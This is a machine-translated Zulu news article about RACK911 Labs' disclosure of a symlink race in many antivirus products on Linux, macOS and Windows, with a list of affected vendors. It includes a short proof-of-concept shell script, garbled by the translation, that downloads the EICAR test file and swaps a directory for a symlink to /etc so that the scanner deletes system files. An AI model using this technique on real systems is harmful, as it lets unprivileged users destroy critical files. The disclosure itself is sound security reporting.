Abacwaningi abavela ku-RACK911 Labs
Ukuze wenze ukuhlasela, udinga ukulayisha ifayela elibonwa i-antivirus njengenonya (ngokwesibonelo, ungasebenzisa isiginesha yokuhlola), futhi emva kwesikhathi esithile, ngemuva kokuthi i-antivirus ithola ifayela eliyingozi, kodwa ngokushesha ngaphambi kokubiza umsebenzi. ukuze uyisuse, buyisela uhla lwemibhalo ngefayela ngesixhumanisi esingokomfanekiso. Ku-Windows, ukufeza umphumela ofanayo, ukushintshwa kohla lwemibhalo kwenziwa kusetshenziswa ukuhlangana kohla lwemibhalo. Inkinga iwukuthi cishe wonke ama-antivirus awazange ahlole kahle izixhumanisi ezingokomfanekiso futhi, ekholelwa ukuthi asusa ifayela elinonya, asuse ifayela ohlwini lwemibhalo lapho isixhumanisi esingokomfanekiso sikhomba khona.
Ku-Linux naku-macOS kuboniswa ukuthi ngale ndlela umsebenzisi ongenalungelo angakwazi kanjani ukususa /etc/passwd nanoma yiliphi elinye ifayela lesistimu, futhi ku-Windows umtapo wezincwadi we-DDL we-antivirus ngokwayo ukuvimba umsebenzi wawo (ku-Windows ukuhlasela kunqunyelwe ukususa kuphela. amafayela angasetshenzisiwe okwamanje ezinye izinhlelo zokusebenza). Isibonelo, umhlaseli angakwazi ukudala uhla lwemibhalo "lokuxhaphaza" futhi alayishe ifayela le-EpSecApiLib.dll elinesiginesha yegciwane lokuhlola kulo, abese efaka esikhundleni senkomba ethi "exploit" ngesixhumanisi esithi "C:\Program Files (x86)\McAfee\ I-Endpoint Security\Endpoint Securityβ ngaphambi kokuyisusa I-Platform", okuzoholela ekukhishweni kwelabhulali ye-EpSecApiLib.dll kukhathalogi yokulwa namagciwane. Ku-Linux nama-macos, iqhinga elifanayo lingenziwa ngokufaka uhla lwemibhalo esikhundleni sesixhumanisi "/ njll".
#! / bin / sh
rm -rf /home/user/exploit; mkdir /ikhaya/umsebenzisi/ukuxhaphaza/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
ngenkathi inotifywait -m β/home/user/exploit/passwdβ | grep -m 5 βVULAβ
do
rm -rf /home/user/exploit; ln -s /etc/home/user/exploit
kwenziwe
Ngaphezu kwalokho, izinhlelo eziningi ze-antivirus ze-Linux ne-macOS zitholwe zisebenzisa amagama amafayela angabikezelwa lapho kusebenza ngamafayela esikhashana kuhlu lwemibhalo lwe-/tmp kanye / lwangasese/tmp, olungase lusetshenziselwe ukukhulisa amalungelo kumsebenzisi oyimpande.
Njengamanje, izinkinga sezilungisiwe ngabahlinzeki abaningi, kodwa kuyaphawuleka ukuthi izaziso zokuqala mayelana nenkinga zithunyelwe kubakhiqizi ekwindla ka-2018. Yize kungebona bonke abathengisi abakhiphe izibuyekezo, banikezwe okungenani izinyanga eziyi-6 zokuchibiyela, futhi i-RACK911 Labs ikholelwa ukuthi manje isikhululekile ukudalula ubungozi. Kuyaphawuleka ukuthi i-RACK911 Labs ibisebenzela ukuhlonza ukukhubazeka isikhathi eside, kodwa ibingalindele ukuthi kuzoba nzima kangaka ukusebenza nozakwethu abavela embonini ye-antivirus ngenxa yokubambezeleka kokukhishwa kwezibuyekezo kanye nokushaya indiva isidingo sokulungisa ezokuphepha ngokushesha. izinkinga.
Imikhiqizo ethintekile (iphakheji ye-antivirus yamahhala i-ClamAV ayifakiwe ohlwini):
- Linux
- IBitDefender GravityZone
- IComodo Endpoint Security
- I-Eset File Server Security
- I-F-Secure Linux Security
- Ukuphepha Kaspersy Endpoint
- Ukuphepha kweMcAfee Endpoint
- ISophos Anti-Virus yeLinux
- Windows
- I-Avast Free Anti-Virus
- I-Avira Free Anti-Virus
- IBitDefender GravityZone
- IComodo Endpoint Security
- F-Secure Computer Ukuvikelwa
- Ukuphepha kwe-FireEye Endpoint
- Bamba u-X (Sophos)
- Ukuphepha kweKaspersky Endpoint
- Ama-Malwarebyte eWindows
- Ukuphepha kweMcAfee Endpoint
- IPanda Dome
- I-Webroot Iphephile Noma Kukuphi
- macOS
- AVG
- I-BitDefender Ukuphepha Okuphelele
- Ukuphepha kwe-Eset Cyber
- Ukuphepha kwe-intanethi ye-Kaspersky
- McAfee Total Protection
- IMicrosoft Defender (BETA)
- I-Norton Security
- Ikhaya le-Sophos
- I-Webroot Iphephile Noma Kukuphi
Source: opennet.ru